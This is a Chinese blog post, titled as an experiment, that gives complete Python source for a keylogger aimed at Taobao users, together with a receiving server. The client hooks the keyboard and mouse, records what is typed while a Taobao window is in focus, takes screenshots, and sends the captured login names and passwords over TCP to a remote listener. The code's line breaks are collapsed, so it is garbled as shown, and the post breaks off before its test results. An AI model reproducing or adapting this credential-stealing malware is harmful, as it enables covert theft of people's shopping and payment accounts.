Python:通过远程监控用户输入来获取淘宝账号和密码的实验（一）

blueice

　　在前面两篇文章中实现了将用户输入信息抓取到后，写入文件，把用户操作的截图也保存了下来，但些文件是在用户的机器上的，获取到并不容易，本次再次优化了下，将用户输入发送到监控者的电脑上，图片传送回来目前还没有实现，后续在分析。
　　一、代码：
　　服务端(hook_server.py)：
#!/usr/bin/env python# -*- coding: utf-8 -*-import socketdef hook_tcp_server():'''Function:接收远程机器上发送过来的信息并输入出到终端Input：evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''        host = '192.168.1.101' port = 34586buf_size = 1024addr =(host, port)tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)tcp_server_socket.bind(addr)tcp_server_socket.listen(5)print 'waiting for connectiong...'while True:tcp_client_socket, addr = tcp_server_socket.accept()# print 'connected from :', addrwhile True:msg = tcp_client_socket.recv(buf_size)print msgif not msg:breaktcp_client_socket.close()tcp_server_socket.close()if __name__ == '__main__':hook_tcp_server()
2. 客户端（hook_client.py）：#!/usr/bin/env python# -*- coding: utf-8 -*-import pythoncomimport pyHookimport timefrom PIL import ImageGrabimport socketdef send_msg_to_remote(msg):'''Function:向远程服务器发送信息Input：evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''    host = '192.168.1.101'port = 34586buf_size = 1024addr =(host, port)if len(msg) != 0:tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:tcp_client_sock.connect(addr)except IOError, e:print ('Error:%s' % e.args[0])tcp_client_sock.close()data = time.strftime('[%Y-%m-%d %H:%M:%S]',time.localtime(time.time()))tip_info = data + 'from ' + socket.gethostname() + ':'tcp_client_sock.sendall(tip_info + msg)tcp_client_sock.close()def onMouseEvent(event):'''Function:处理鼠标左键单击事件，如果当前MSG中存放了信息，将其写入文件，因为有的用户在输入 完用户名后，不是使用TAB键切换到密码框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯，所以此处要判断是否通过鼠标切换了输入窗口Input：evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''global MSGif len(MSG) != 0:send_msg_to_remote(MSG)MSG = '' #屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()pic.save('%s.png' % pic_name)#保存成为以日期命名的图片return Truedef onKeyboardEvent(event): "处理键盘事件"  '''Function:处理键盘事件，如果当前窗口为TAOBAO页面，刚开始监控并记录用户输入因为此时用户可能准备输入用户名及密码进行登陆，所以将用户输入的所有可见的ascii字符记录下来，此处要考虑用户是否使用了TAB键或回车键来结束输入，此时要将信息发送给远程服务器。Input：evenOutput: Tureauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''     global MSGif event.WindowName.decode('GBK').find(u"淘宝") != -1:if (127 >= event.Ascii > 31) or (event.Ascii == 8):MSG += chr(event.Ascii)       if (event.Ascii == 9) or (event.Ascii == 13):send_msg_to_remote(MSG)MSG = '' #屏幕抓图实现pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))pic = ImageGrab.grab()#保存成为以日期命名的图片pic.save('%s.png' % pic_name)return Trueif __name__ == "__main__": '''Function:获取TAOBAO账号及密码，增加抓图功能Input：NONEOutput: NONEauthor: socratesblog:http://blog.csdn.net/dyx1024date:2012-03-03'''  MSG = ''   #创建hook句柄hm = pyHook.HookManager()#监控鼠标hm.SubscribeMouseLeftDown(onMouseEvent)hm.HookMouse()#监控键盘hm.KeyDown = onKeyboardEventhm.HookKeyboard()#循环获取消息pythoncom.PumpMessages()
二、测试：　　1、环境信息：
　　服务端脚本hook_server.py运行于Unbutu上（IP:192.168.1.101，监听端口：34586）
　　客户端脚本hook_client.py运行于Windows xp上（主机名：winxp-duanyx）
　　2、实测：
　　用户界面输入：

　　服务器上获取到的数据：